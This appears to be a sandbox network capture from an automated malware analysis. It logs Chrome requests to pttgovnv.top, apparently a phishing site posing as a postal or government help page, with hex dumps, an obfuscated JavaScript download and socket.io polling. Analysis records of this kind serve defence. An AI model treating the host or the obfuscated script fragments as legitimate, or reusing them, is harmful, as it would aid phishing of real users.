          2024-09-01 22:25:23 UTC1369INData Raw: 31 d2 e3 6e d4 c3 86 98 a8 38 68 c2 0d 41 ae 62 34 c1 12 1d 28 30 6b 1b c3 4b 72 0a e2 64 39 e0 44 d8 13 04 bc 00 f1 bd ac 22 a8 37 14 f1 4d f2 d9 b3 4f c6 ce f3 01 b3 b1 7d 1b 32 60 b5 f0 59 73 e1 46 55 26 03 36 92 6f 57 35 8e d2 ce 4e 2d ec 41 26 e0 5f 1a f7 57 c6 f3 14 11 4e 87 0d f7 c0 21 46 1b 5d 26 bf 0d f6 c0 85 28 93 0e 54 ec 8c e2 85 d3 91 c1 24 cf ae 6f 5d da 41 05 4e 5b b1 5d b6 1e d1 29 8e 8c 3f ec b2 74 84 53 ac 52 71 31 69 b0 82 0c a8 c9 7b 44 f1 1a 00 85 ed 29 54 50 f2 c7 77 2a 42 2c de 96 9d 81 2d 71 04 72 0d 05 2e 14 04 01 b5 44 8f 9b 0b e6 d6 f6 fa db 78 f9 75 75 e9 9d 4f 0e ae e0 3f 8e ed cf 9b 3e ed 3b 62 52 cf ab bf 57 ed 68 17 ae db 46 42 99 15 fc 9e cd ea 4d be 6f 8e 7d a5 aa 00 fb 99 b0 a6 12 c0 2b 2f d7 8a 9b c4 45 dc b8 aa 74 8b
          Data Ascii: 1n8hAb4(0kKrd9D"7MO}2`YsFU&6oW5N-A&_WN!F]&(T$o]AN[])?tSRq1i{D)TPw*B,-qr.DxuuO?>;bRWhFBMo}+/Et
          2024-09-01 22:25:23 UTC1369INData Raw: d6 a9 ff 52 ce ab 4d 7b 49 77 52 f2 c1 97 47 7e 53 d7 ab 53 f8 f2 d7 4f 3a ed 7d 06 2d 5c cb 57 11 91 6c 38 bf 4f 6d 38 bb f2 c7 85 13 6f 1b 32 e6 3d f9 5d ee 8a df ab b6 f1 46 3e de b3 8f 38 d6 be a4 3e f7 85 7a 52 3d 30 b8 b6 86 ac 22 0b 54 52 49 74 ee 46 80 23 fc a7 73 e8 0e 01 56 da b9 b6 4c 6a 93 85 30 25 ee 8d 7a 23 47 80 12 e9 91 c6 a7 94 a0 01 0d 68 bc 11 a0 61 85 15 97 82 d4 1b 14 02 82 2b 20 e4 17 e8 0d 7c f7 55 7c 57 b9 29 d6 d4 f8 13 39 5b 1f 08 7a 0b 75 87 2e f5 20 a7 d4 12 7e 32 79 73 f0 bc 51 d3 99 5d e4 38 f0 91 c3 c0 47 ec 40 09 73 b8 bb 34 39 11 a5 63 ca 4f 72 6c d1 c6 54 1f bd 6d 2a ca 60 01 ba 69 29 c0 20 53 43 72 8a 43 71 c1 26 59 d2 a2 72 06 e5 0a a0 6e e5 42 43 06 4a ca 26 23 a2 a4 0f 2e 65 4b a5 9c 2a 81 e0 02 68 99 e3 94 75 95 d4
          Data Ascii: RM{IwRG~SSO:}-\Wl8Om8o2=]F>8>zR=0"TRItF#sVLj0%z#Gha+ |U|W)9[zu. ~2ysQ]8G@s49cOrlTm*`i) SCrCq&YrnBCJ&#.eK*hu
          2024-09-01 22:25:23 UTC1369INData Raw: ca 9f 5a f3 d4 ea 95 14 56 ea 2e 0a ab 14 a0 82 b7 73 11 1b c2 ca 15 87 95 bf 85 f4 39 00 56 0e 26 73 21 ac 90 de 79 1d a0 a6 08 16 9b 09 31 0c 8e a4 19 80 e6 b2 c1 64 4c 28 52 5d 03 3a 34 42 13 c3 7f 01 df 97 ef 93 11 bf ab 5f 55 fc 37 10 7e a7 2e ef ae 6e 20 7d f9 eb 01 92 c1 f1 24 c0 d1 0a 7a cb 1d 1a 26 1a 19 26 2a 1e 00 a5 c5 46 41 69 41 50 7a 13 56 3b 5b 28 4e cb 51 06 f1 69 04 5c 31 1b 00 21 75 12 2c 82 53 6c 48 6f 0c d4 dc de 22 81 38 74 b0 92 40 32 8c 57 13 1b 21 ea df c9 8a e3 ea 76 f5 64 b4 71 f7 f3 af 7c a6 6b 7a ff a4 fa f9 84 d8 14 7e 54 6c 07 ff cb aa 55 ab 1f a6 67 06 75 48 1e 78 4e 2b b4 ee 50 b7 8a 08 d0 96 70 aa 5e 91 59 13 40 a8 f7 a7 24 bc 7b 39 29 cc 94 60 00 46 b2 4f b4 4a de ac 20 c2 3b 47 52 5c 6e 6a 14 09 32 a3 88 57 6a 20 76 77
          Data Ascii: ZV.s9V&s!y1dL(R]:4B_U7~.n }$z&&*FAiAPzV;[(NQi\1!u,SlHo"8t@2W!vdq|kz~TlUguHxN+Pp^Y@${9)`FOJ ;GR\nj2Wj vw
          2024-09-01 22:25:23 UTC1369INData Raw: 79 ac c1 70 2f 95 5b 64 e0 61 33 f5 6e 90 fb b2 d1 0e 4a e5 16 3b 75 15 59 a2 11 23 ae 39 13 2f 32 a9 3b 82 a0 93 32 87 ae d9 ed a3 32 b6 4b 8a 02 41 a2 d1 00 20 75 63 38 0a d5 8e 80 43 50 65 3a 0d d4 7e 3b 72 b6 4c 9f e4 6c d4 03 0b d6 31 07 12 92 6f 03 5a c8 99 f8 90 5f 10 34 b8 92 fc fb 72 9d d1 38 e3 eb 4f fe f5 f3 99 bb 95 ce d6 60 c9 96 fa cd 1b 36 6c ab df a0 77 ab 8b e7 8f df a5 9e 55 7f 81 7f 1f f5 1f b8 82 cf fb ee d8 f9 53 67 3e 78 1d 66 3e 1d f6 6f 99 38 22 59 f7 47 43 2e 2e c2 6c 6b d1 fd 53 ae d1 fd cd 09 dd 5f d0 14 39 d4 f7 bd 3e 43 31 68 6e 94 dd a0 ee 9f cb 4d 27 a6 7f f7 df de 2e 5c b1 30 a4 46 9e de b1 f4 f1 fb 9e bd a0 5e e6 33 89 8b b4 cd f5 ad f0 66 aa 83 df f9 a4 6a 6d 25 c9 03 b8 c2 5c c4 0a 80 ab 13 e0 3a 96 8b 58 11 ae 0e 9c 92
          Data Ascii: yp/[da3nJ;uY#9/2;22KA uc8CPe:~;rLl1oZ_4r8O`6lwUSg>xf>o8"YGC..lkS_9>C1hnM'.\0F^3fjm%\:X
          2024-09-01 22:25:23 UTC1369INData Raw: bb 13 29 2a a7 64 73 a8 d7 8b 26 73 9c ed fa 10 f9 72 7c 7f 42 c1 16 5c 5c 92 6e 2c 79 7e 32 21 fd 8d a5 07 67 1f 7c a9 ee fe 59 4f ac ab bb 7f f6 d6 d5 62 9f 0d 03 86 1f 1c 3c ee d5 0f 00 2f 8f 2f 5a 14 79 29 b6 15 df 5f fe 28 76 34 b1 1f 3d 60 7d ee 84 0d c9 92 b4 3a c5 61 61 94 95 49 0f 74 5d 20 3a 60 68 0b fa 8c d1 1a e1 d6 16 63 65 8b e1 d8 ae a1 39 a9 65 ee 57 1f 1c 98 6c f8 c0 d4 b7 de 86 83 b3 67 07 4c f0 b6 61 74 76 70 6a 0e 9e 81 59 31 fe 35 06 e6 84 f8 1b b7 1f 39 e2 2c d8 6b 61 c8 0b 33 b2 a5 d0 b8 3d 97 16 fb 83 08 8c f6 0f 2d f6 07 cd 23 89 d8 1f e0 4e 68 3f 02 7c e5 93 63 12 a7 13 eb 85 6f 49 8a fa cb 85 b5 5f ff 75 cf ee a7 9f 7e ee b9 67 9e ae e3 f3 08 ac 50 7d 5f bd ac fe a6 9e 7e 8c f0 2f 7c f0 e9 b9 d3 a7 ce 9e 41 d9 0b e8 fd 4c 0a af
          Data Ascii: )*ds&sr|B\\n,y~2!g|YOb<//Zy)_(v4=`}:aaIt] :`hce9eWlgLatvpjY159,ka3=-#Nh?|coI_u~gP}_~/|AL
          2024-09-01 22:25:23 UTC1369INData Raw: ae b5 8a f1 83 63 27 f9 ef 62 11 fe 2f 53 85 c1 0b 16 34 1f 5c 10 8f e7 3e aa 6b 02 dc 03 cd d9 a8 85 ab e2 52 3c cc 34 46 90 18 02 f2 f9 cf a0 77 d3 49 a3 f5 22 4e 3f 55 d1 bc 98 35 13 8a f8 a9 b0 ee 47 2d 2d 8b e2 bf 07 53 34 fc 70 ee 88 44 8f 9b 6c 02 19 d0 4a 21 51 de 85 94 4b 40 0a 3d 40 a0 dd 06 0f c8 17 6e af cf 53 8c 8d f9 d5 0b 67 7c d2 f4 ed f9 f3 33 a7 1e fe db 43 e4 97 15 fc 88 51 24 f4 c4 9e 65 fa a3 ea d9 8f 0b ac 05 1f ab 1f 4f 18 c1 2f e7 eb b7 90 92 89 c3 38 42 2e a8 0e 7e 2e 95 0b 7d 5c 42 24 04 26 81 2f 26 12 a2 86 4e 2e ac 50 1d 46 f1 f7 66 0a c7 3e b0 5e 8c ff cd c4 f5 da 71 bd 36 58 68 26 b5 c5 69 cb 26 98 af 22 9c 91 cd 21 25 0d d6 2b 85 22 69 02 ae 30 0d d6 1b 11 d2 a8 17 32 13 96 0e 32 78 36 ae d7 4b 91 2a 8d a6 17 28 46 03 f3 cb
          Data Ascii: c'b/S4\>kR<4FwI"N?U5G--S4pDlJ!QK@=@nSg|3CQ$eO/8B.~.}\B$&/&N.PFf>^q6Xh&i&"!%+"i022x6K*(F


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          40192.168.2.449777104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC364OUTGET /help/assets/164f9b57JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC748INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1c1a7-18fc3d84650"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYzcG1Np%2FrMpMo8SAYgYatOAbT9zgp37u7%2Bn21vV5eMQ2S3U1Y7IDoNVAPx19jG7j2bizYjADzXoJZMzyxnHa65X1n8zvf5xrJOtCVSYiE0LVUr%2FsJLwnZsfCX2t6pg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad079f8b0f8b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC621INData Raw: 37 63 63 33 0d 0a 76 61 72 20 61 32 5f 30 78 34 39 30 32 34 64 3d 61 32 5f 30 78 32 30 64 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 39 38 31 34 2c 5f 30 78 31 64 31 31 38 31 29 7b 76 61 72 20 5f 30 78 34 35 37 37 38 31 3d 61 32 5f 30 78 32 30 64 63 2c 5f 30 78 32 66 35 66 39 34 3d 5f 30 78 33 33 39 38 31 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 38 37 36 30 34 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 31 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 32 61 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 36 65 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30
          Data Ascii: 7cc3var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0
          2024-09-01 22:25:23 UTC1369INData Raw: 78 32 66 35 66 39 34 5b 27 70 75 73 68 27 5d 28 5f 30 78 32 66 35 66 39 34 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 5f 30 78 32 34 39 63 2c 30 78 65 35 31 65 35 29 29 3b 76 61 72 20 61 32 5f 30 78 31 63 37 61 64 66 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 63 61 37 65 66 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 38 62 32 65 2c 5f 30 78 33 62 32 61 66 30 29 7b 76 61 72 20 5f 30 78 31 65 65 36 36 63 3d 5f 30 78 31 63 61 37 65 66 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 32 38 31 64 63 62 3d 61 32 5f 30 78 32 30 64 63 3b 69 66 28 5f 30 78 33 62 32 61 66 30 29 7b 76 61 72 20 5f 30 78 32 36 34 38 30 66 3d 5f 30 78 33 62 32 61 66 30 5b 5f 30 78 32 38 31 64 63 62 28 30 78
          Data Ascii: x2f5f94['push'](_0x2f5f94['shift']());}}}(a2_0x249c,0xe51e5));var a2_0x1c7adf=(function(){var _0x1ca7ef=!![];return function(_0x448b2e,_0x3b2af0){var _0x1ee66c=_0x1ca7ef?function(){var _0x281dcb=a2_0x20dc;if(_0x3b2af0){var _0x26480f=_0x3b2af0[_0x281dcb(0x
          2024-09-01 22:25:23 UTC1369INData Raw: 65 64 69 6c 7c 45 67 72 61 76 65 7c 45 61 63 75 74 65 7c 45 63 69 72 63 7c 45 75 6d 6c 7c 49 67 72 61 76 65 7c 49 61 63 75 74 65 7c 49 63 69 72 63 7c 49 75 6d 6c 7c 45 54 48 7c 4e 74 69 6c 64 65 7c 4f 67 72 61 76 65 7c 4f 61 63 75 74 65 7c 4f 63 69 72 63 7c 4f 74 69 6c 64 65 7c 4f 75 6d 6c 7c 74 69 6d 65 73 7c 4f 73 6c 61 73 68 7c 55 67 72 61 76 65 7c 55 61 63 75 74 65 7c 55 63 69 72 63 7c 55 75 6d 6c 7c 59 61 63 75 74 65 7c 54 48 4f 52 4e 7c 73 7a 6c 69 67 7c 61 67 72 61 76 65 7c 61 61 63 75 74 65 7c 61 63 69 72 63 7c 61 74 69 6c 64 65 7c 61 75 6d 6c 7c 61 72 69 6e 67 7c 61 65 6c 69 67 7c 63 63 65 64 69 6c 7c 65 67 72 61 76 65 7c 65 61 63 75 74 65 7c 65 63 69 72 63 7c 65 75 6d 6c 7c 69 67 72 61 76 65 7c 69 61 63 75 74 65 7c 69 63 69 72 63 7c 69 75 6d 6c
          Data Ascii: edil|Egrave|Eacute|Ecirc|Euml|Igrave|Iacute|Icirc|Iuml|ETH|Ntilde|Ograve|Oacute|Ocirc|Otilde|Ouml|times|Oslash|Ugrave|Uacute|Ucirc|Uuml|Yacute|THORN|szlig|agrave|aacute|acirc|atilde|auml|aring|aelig|ccedil|egrave|eacute|ecirc|euml|igrave|iacute|icirc|iuml
          2024-09-01 22:25:23 UTC1369INData Raw: 72 6e 7c 74 69 6d 65 73 7c 75 61 63 75 74 65 7c 75 63 69 72 63 7c 75 67 72 61 76 65 7c 75 6d 6c 7c 75 75 6d 6c 7c 79 61 63 75 74 65 7c 79 65 6e 7c 79 75 6d 6c 7c 23 5c 64 2b 7c 23 5b 78 58 5d 5b 5c 64 61 2d 66 41 2d 46 5d 2b 7c 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 2b 29 3b 3f 2f 67 7d 2c 77 5b 27 6e 61 6d 65 64 52 65 66 65 72 27 2b 27 65 6e 63 65 73 27 5d 3d 7b 27 78 6d 6c 27 3a 7b 27 65 6e 74 69 74 69 65 73 27 3a 7b 27 26 6c 74 3b 27 3a 27 3c 27 2c 27 26 67 74 3b 27 3a 27 3e 27 2c 27 26 71 75 6f 74 3b 27 3a 27 5c 78 32 32 27 2c 27 26 61 70 6f 73 3b 27 3a 27 5c 78 32 37 27 2c 27 26 61 6d 70 3b 27 3a 27 26 27 7d 2c 27 63 68 61 72 61 63 74 65 72 73 27 3a 7b 27 3c 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 66 33 29 2c 27 3e 27 3a 27 26 67 74 3b 27 2c 27
          Data Ascii: rn|times|uacute|ucirc|ugrave|uml|uuml|yacute|yen|yuml|#\d+|#[xX][\da-fA-F]+|[0-9a-zA-Z]+);?/g},w['namedRefer'+'ences']={'xml':{'entities':{'&lt;':'<','&gt;':'>','&quot;':'\x22','&apos;':'\x27','&amp;':'&'},'characters':{'<':a2_0x49024d(0x2f3),'>':'&gt;','
          2024-09-01 22:25:23 UTC1369INData Raw: 2c 27 26 41 74 69 6c 64 65 3b 27 3a 27 c3 83 27 2c 27 26 41 75 6d 6c 27 3a 27 c3 84 27 2c 27 26 41 75 6d 6c 3b 27 3a 27 c3 84 27 2c 27 26 41 72 69 6e 67 27 3a 27 c3 85 27 2c 27 26 41 72 69 6e 67 3b 27 3a 27 c3 85 27 2c 27 26 41 45 6c 69 67 27 3a 27 c3 86 27 2c 27 26 41 45 6c 69 67 3b 27 3a 27 c3 86 27 2c 27 26 43 63 65 64 69 6c 27 3a 27 c3 87 27 2c 27 26 43 63 65 64 69 6c 3b 27 3a 27 c3 87 27 2c 27 26 45 67 72 61 76 65 27 3a 27 c3 88 27 2c 27 26 45 67 72 61 76 65 3b 27 3a 27 c3 88 27 2c 27 26 45 61 63 75 74 65 27 3a 27 c3 89 27 2c 27 26 45 61 63 75 74 65 3b 27 3a 27 c3 89 27 2c 27 26 45 63 69 72 63 27 3a 27 c3 8a 27 2c 27 26 45 63 69 72 63 3b 27 3a 27 c3 8a 27 2c 27 26 45 75 6d 6c 27 3a 27 c3 8b 27 2c 27 26 45 75 6d 6c 3b 27 3a 27 c3 8b 27 2c 27 26 49 67
          Data Ascii: ,'&Atilde;':'','&Auml':'','&Auml;':'','&Aring':'','&Aring;':'','&AElig':'','&AElig;':'','&Ccedil':'','&Ccedil;':'','&Egrave':'','&Egrave;':'','&Eacute':'','&Eacute;':'','&Ecirc':'','&Ecirc;':'','&Euml':'','&Euml;':'','&Ig
          2024-09-01 22:25:23 UTC1369INData Raw: 27 2c 27 26 6f 67 72 61 76 65 27 3a 27 c3 b2 27 2c 27 26 6f 67 72 61 76 65 3b 27 3a 27 c3 b2 27 2c 27 26 6f 61 63 75 74 65 27 3a 27 c3 b3 27 2c 27 26 6f 61 63 75 74 65 3b 27 3a 27 c3 b3 27 2c 27 26 6f 63 69 72 63 27 3a 27 c3 b4 27 2c 27 26 6f 63 69 72 63 3b 27 3a 27 c3 b4 27 2c 27 26 6f 74 69 6c 64 65 27 3a 27 c3 b5 27 2c 27 26 6f 74 69 6c 64 65 3b 27 3a 27 c3 b5 27 2c 27 26 6f 75 6d 6c 27 3a 27 c3 b6 27 2c 27 26 6f 75 6d 6c 3b 27 3a 27 c3 b6 27 2c 27 26 64 69 76 69 64 65 27 3a 27 c3 b7 27 2c 27 26 64 69 76 69 64 65 3b 27 3a 27 c3 b7 27 2c 27 26 6f 73 6c 61 73 68 27 3a 27 c3 b8 27 2c 27 26 6f 73 6c 61 73 68 3b 27 3a 27 c3 b8 27 2c 27 26 75 67 72 61 76 65 27 3a 27 c3 b9 27 2c 27 26 75 67 72 61 76 65 3b 27 3a 27 c3 b9 27 2c 27 26 75 61 63 75 74 65 27 3a 27
          Data Ascii: ','&ograve':'','&ograve;':'','&oacute':'','&oacute;':'','&ocirc':'','&ocirc;':'','&otilde':'','&otilde;':'','&ouml':'','&ouml;':'','&divide':'','&divide;':'','&oslash':'','&oslash;':'','&ugrave':'','&ugrave;':'','&uacute':'
          2024-09-01 22:25:23 UTC1369INData Raw: ce b4 27 2c 27 26 65 70 73 69 6c 6f 6e 3b 27 3a 27 ce b5 27 2c 27 26 7a 65 74 61 3b 27 3a 27 ce b6 27 2c 27 26 65 74 61 3b 27 3a 27 ce b7 27 2c 27 26 74 68 65 74 61 3b 27 3a 27 ce b8 27 2c 27 26 69 6f 74 61 3b 27 3a 27 ce b9 27 2c 27 26 6b 61 70 70 61 3b 27 3a 27 ce ba 27 2c 27 26 6c 61 6d 62 64 61 3b 27 3a 27 ce bb 27 2c 27 26 6d 75 3b 27 3a 27 ce bc 27 2c 27 26 6e 75 3b 27 3a 27 ce bd 27 2c 27 26 78 69 3b 27 3a 27 ce be 27 2c 27 26 6f 6d 69 63 72 6f 6e 3b 27 3a 27 ce bf 27 2c 27 26 70 69 3b 27 3a 27 cf 80 27 2c 27 26 72 68 6f 3b 27 3a 27 cf 81 27 2c 27 26 73 69 67 6d 61 66 3b 27 3a 27 cf 82 27 2c 27 26 73 69 67 6d 61 3b 27 3a 27 cf 83 27 2c 27 26 74 61 75 3b 27 3a 27 cf 84 27 2c 27 26 75 70 73 69 6c 6f 6e 3b 27 3a 27 cf 85 27 2c 27 26 70 68 69 3b 27 3a
          Data Ascii: ','&epsilon;':'','&zeta;':'','&eta;':'','&theta;':'','&iota;':'','&kappa;':'','&lambda;':'','&mu;':'','&nu;':'','&xi;':'','&omicron;':'','&pi;':'','&rho;':'','&sigmaf;':'','&sigma;':'','&tau;':'','&upsilon;':'','&phi;':
          2024-09-01 22:25:23 UTC1369INData Raw: 2c 27 26 73 70 61 64 65 73 3b 27 3a 27 e2 99 a0 27 2c 27 26 63 6c 75 62 73 3b 27 3a 27 e2 99 a3 27 2c 27 26 68 65 61 72 74 73 3b 27 3a 27 e2 99 a5 27 2c 27 26 64 69 61 6d 73 3b 27 3a 27 e2 99 a6 27 7d 2c 27 63 68 61 72 61 63 74 65 72 73 27 3a 7b 27 5c 78 32 37 27 3a 27 26 61 70 6f 73 3b 27 2c 27 5c 75 30 30 61 30 27 3a 27 26 6e 62 73 70 3b 27 2c 27 c2 a1 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 31 34 29 2c 27 c2 a2 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 33 37 29 2c 27 c2 a3 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 39 39 29 2c 27 c2 a4 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 37 31 29 2c 27 c2 a5 27 3a 27 26 79 65 6e 3b 27 2c 27 c2 a6 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 66 66 29 2c 27 c2 a7 27 3a 61
          Data Ascii: ,'&spades;':'','&clubs;':'','&hearts;':'','&diams;':''},'characters':{'\x27':'&apos;','\u00a0':'&nbsp;','':a2_0x49024d(0x314),'':a2_0x49024d(0x537),'':a2_0x49024d(0x699),'':a2_0x49024d(0x371),'':'&yen;','':a2_0x49024d(0x2ff),'':a
          2024-09-01 22:25:23 UTC1369INData Raw: 2c 27 c3 9b 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 61 39 29 2c 27 c3 9c 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 65 65 29 2c 27 c3 9d 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 64 65 29 2c 27 c3 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 65 34 29 2c 27 c3 9f 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 30 38 29 2c 27 c3 a0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 63 39 29 2c 27 c3 a1 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 65 38 29 2c 27 c3 a2 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 34 64 29 2c 27 c3 a3 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 36 39 29 2c 27 c3 a4 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 32 63 29 2c 27 c3 a5 27 3a 61 32 5f 30 78 34 39 30 32
          Data Ascii: ,'':a2_0x49024d(0x2a9),'':a2_0x49024d(0x2ee),'':a2_0x49024d(0x6de),'':a2_0x49024d(0x5e4),'':a2_0x49024d(0x308),'':a2_0x49024d(0x5c9),'':a2_0x49024d(0x3e8),'':a2_0x49024d(0x34d),'':a2_0x49024d(0x569),'':a2_0x49024d(0x62c),'':a2_0x4902
          2024-09-01 22:25:23 UTC1369INData Raw: 3a 27 26 6c 64 71 75 6f 3b 27 2c 27 e2 80 9d 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 32 61 29 2c 27 e2 80 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 38 35 29 2c 27 e2 80 a0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 31 62 32 29 2c 27 e2 80 a1 27 3a 27 26 44 61 67 67 65 72 3b 27 2c 27 e2 80 b0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 30 61 29 2c 27 e2 80 b9 27 3a 27 26 6c 73 61 71 75 6f 3b 27 2c 27 e2 80 ba 27 3a 27 26 72 73 61 71 75 6f 3b 27 2c 27 e2 82 ac 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 31 64 38 29 2c 27 c6 92 27 3a 27 26 66 6e 6f 66 3b 27 2c 27 ce 91 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 32 33 29 2c 27 ce 92 27 3a 27 26 42 65 74 61 3b 27 2c 27 ce 93 27 3a 61 32 5f 30 78 34 39 30 32 34 64
          Data Ascii: :'&ldquo;','':a2_0x49024d(0x22a),'':a2_0x49024d(0x285),'':a2_0x49024d(0x1b2),'':'&Dagger;','':a2_0x49024d(0x20a),'':'&lsaquo;','':'&rsaquo;','':a2_0x49024d(0x1d8),'':'&fnof;','':a2_0x49024d(0x523),'':'&Beta;','':a2_0x49024d


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          41192.168.2.449772172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liLHG&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 2
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:22 UTC2OUTData Raw: 34 30
          Data Ascii: 40
          2024-09-01 22:25:23 UTC612INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pr5rJoDFQ3BaR1gl1mxL0B3xpKe2exDuPVQ3okVnbQ5%2Bdo%2FM7EzGHCNF9pchkppNnWO2%2BFpnGX9ONG4dySD4NavItuZPVR9Ql8mRRNqCrVQTb7YQiZYALFXl3YZsW7g%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad07994d8ce6-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:23 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          42192.168.2.449781172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLHP&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC620INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 32
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
